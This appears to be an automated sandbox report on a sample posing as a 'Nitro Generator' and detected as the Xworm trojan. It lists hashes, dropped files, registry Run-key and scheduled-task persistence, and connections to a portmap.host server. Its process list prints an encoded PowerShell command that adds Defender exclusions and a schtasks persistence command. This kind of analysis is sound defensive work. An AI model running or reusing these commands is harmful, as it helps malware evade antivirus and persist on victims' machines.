| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/300-35-0x0000000001000000-0x000000000101A000-memory.dmp
memory/1652-38-0x0000000001230000-0x000000000124A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-21 23:03
Reported
2024-06-21 23:05
Platform
win10-20240404-en
Max time kernel
145s
Max time network
148s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NitroGen.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Windows\Nitro Generator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Nitro Generator.exe | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
C:\Windows\Nitro Generator.exe
"C:\Windows\Nitro Generator.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-25851.portmap.host | udp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| US | 8.8.8.8:53 | 104.246.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
Files
memory/2280-0-0x00000000005C0000-0x00000000005FE000-memory.dmp
memory/2280-1-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
memory/2280-2-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
memory/68-7-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
memory/68-8-0x0000017FA77F0000-0x0000017FA7812000-memory.dmp
memory/68-9-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
memory/68-10-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
memory/68-13-0x0000017FA78A0000-0x0000017FA7916000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnbku4vv.qeo.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
| MD5 | 16c70bc93e70148d8e32877fb69c5163 |
| SHA1 | 9997631ad75d02297a4c7a06c37db115a0a1c0ec |
| SHA256 | b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d |
| SHA512 | 02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd |
C:\Windows\Nitro Generator.exe
| MD5 | 8bbf53c41f2625a3c4e608ad13cb2c55 |
| SHA1 | 3335287d42f6e674eb1d4465949e02d262bb8391 |
| SHA256 | ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299 |
| SHA512 | 9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec |
memory/5024-54-0x0000000000F90000-0x0000000000FAA000-memory.dmp
memory/2280-56-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0768b8870ea9d68a7334004b95bbba2 |
| SHA1 | 96828a3b50436db8be2cc84464941bda69cc9be8 |
| SHA256 | 3f2b4482354da125b4b9e8770c092839a7617e42be0baf8abd1776b3a5188a86 |
| SHA512 | be1d8d7f98b11cb35b6a6ded20751a5be0a79fe9a8f1301f1db28fb08f2937f3dead07a11edd23dc55897939d4ad68b0903c7a5574c334b0294a7d11570df4c4 |
memory/68-101-0x00007FFBFFDA0000-0x00007FFC00099000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |